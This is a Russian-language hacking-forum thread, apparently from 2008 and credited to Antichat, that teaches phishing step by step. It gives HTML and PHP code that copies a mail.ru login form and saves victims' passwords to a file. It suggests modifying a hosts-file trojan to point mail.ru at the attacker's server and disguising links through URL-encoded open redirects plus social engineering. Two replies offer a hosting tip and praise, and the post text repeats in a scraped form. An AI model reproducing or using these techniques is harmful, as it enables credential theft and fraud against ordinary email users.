Все о фейках - Forum AoA- Хакерство, Читерство, Взлом Онлайн Игр.Баги боты и читы в la2-WoW-CS-RF-PW. Все о Безопасности в Сети...

Knight · 02.05.2008

Все о фейках

Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий
Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая.
Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена.....
1.Задача
Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала.
Дальше нужно найти форму с нашей авторизацией
2.Практика
Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html
_http://www.opennet.ru/base/dev/html_form.txt.html
Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями.

Код HTML:

<form action="1.php" method="POST"> 
    <input type="text" name="login"> 
    <input type="password" name="pass"> 
    <select name="dom"><option value="mail.ru">@mail.ru</option> 
    </select> 
    <br > <input type="submit" value="Войти"> 

    </form>

Теперь дописываем так,что бы пароли сохранялись у нас:)

PHP код:


			
if(@$_POST['login']){    условие

$fp = fopen ("file.txt", "a"); открытие файла

fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n");  пишем в файл данные которые ввел юзер на фейковой страничке 

fclose ($fp); закрываем файл.

Про работу с файлами на php можно прочитать тут
2.Подводный камень
Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально?
Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам.

В файл hosts добавлены следующие строки:

61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 mir stekla 2007 hotel bei at mir5173.com
61.129.75.124 ert0003.e76.163ns.com
219.147.204.249 chair slipcover for small appliances at chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com

Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера.
Троян называется Trojan.Win32. Qhost.hq
Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
на свои допустим
127.0.0.1 mail.ru
Да и самому такой вирус написать не особо сложно
Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой
Можно использовать редирект допустим от тех же служб mail.ru.
Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит:)
Но можно придать еше более красивый вид :
известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса
Кодируем forum.antichat.ru и получаем что то вроде
y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61
Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером.
4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема...

Antichat.ru

mean · 28.09.2008

Только не вздумайте залить на хостинг где нет поддержки php, как например narod.ru

**Nmax59** · 25.11.2008

Очень занимательно

02.05.2008	#1 (permalink)
Knight Халявщег Регистрация: 20.04.2008 Сообщений: 75 Вы сказали Спасибо: 6 Поблагодарили 6 раз(а) в 5 сообщениях	Все о фейках Все о фейках Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая. Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена..... 1.Задача Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала. Дальше нужно найти форму с нашей авторизацией 2.Практика Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html _http://www.opennet.ru/base/dev/html_form.txt.html Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями. Код HTML: <form action="1.php" method="POST"> <input type="text" name="login"> <input type="password" name="pass"> <select name="dom"><option value="mail.ru">@mail.ru</option> </select> <br > <input type="submit" value="Войти"> </form> Теперь дописываем так,что бы пароли сохранялись у нас:) PHP код: `if(@$_POST['login']){ условие $fp = fopen ("file.txt", "a"); открытие файла fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n"); пишем в файл данные которые ввел юзер на фейковой страничке fclose ($fp); закрываем файл.` Про работу с файлами на php можно прочитать тут 2.Подводный камень Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально? Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам. В файл hosts добавлены следующие строки: 61.129.75.124 mir.100888290cs.com 61.129.75.124 woool.100888290cs.com 61.129.75.124 mir stekla 2007 hotel bei at mir5173.com 61.129.75.124 ert0003.e76.163ns.com 219.147.204.249 chair slipcover for small appliances at chenshijituan.com 59.36.96.132 qq.etsoft.com.cn 127.0.0.1 eb114.net 127.0.0.1 www.u7u.cn 61.129.75.124 www.wg581.com Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера. Троян называется Trojan.Win32. Qhost.hq Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com 61.129.75.124 woool.100888290cs.com на свои допустим 127.0.0.1 mail.ru Да и самому такой вирус написать не особо сложно Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой Можно использовать редирект допустим от тех же служб mail.ru. Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит:) Но можно придать еше более красивый вид : известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса Кодируем forum.antichat.ru и получаем что то вроде y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61 Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером. 4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема... Antichat.ru __________________ ПОНРАВИЛОСЬ???ХОЧЕШЬ ЕЩЕ??? ЖМИ СПАСИБО!!!

28.09.2008	#2 (permalink)
mean Young 1337 Keltir Регистрация: 27.09.2008 Сообщений: 50 Вы сказали Спасибо: 0 Поблагодарили 0 раз(а) в 0 сообщениях	Ответ: Все о фейках Только не вздумайте залить на хостинг где нет поддержки php, как например narod.ru

25.11.2008	#3 (permalink)
Nmax59 ЮзверЪ Регистрация: 25.11.2008 Сообщений: 10 Вы сказали Спасибо: 0 Поблагодарили 0 раз(а) в 0 сообщениях	Ответ: Все о фейках Очень занимательно

Опции темы
Версия для печати Отправить по электронной почте
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

Реклама=\